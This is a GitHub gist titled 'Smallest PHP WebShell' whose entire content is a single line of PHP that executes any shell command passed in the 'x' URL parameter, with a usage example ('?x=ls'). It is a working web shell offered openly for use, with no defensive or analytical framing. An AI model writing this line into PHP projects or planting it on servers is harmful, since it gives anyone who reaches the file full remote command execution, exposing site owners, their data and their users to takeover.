Skip to content

Instantly share code, notes, and snippets.

@zidansec
Last active August 2, 2023 20:26
Show Gist options
  • Save zidansec/93ac847a84a3d1d7a725f1f903921cd8 to your computer and use it in GitHub Desktop.
Save zidansec/93ac847a84a3d1d7a725f1f903921cd8 to your computer and use it in GitHub Desktop.
Smallest PHP WebShell
<?=`$_GET[x]`?> // Exploit: ?x=ls
@zidansec
Copy link
Author

zidansec commented Aug 2, 2023

smallest-webshell

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment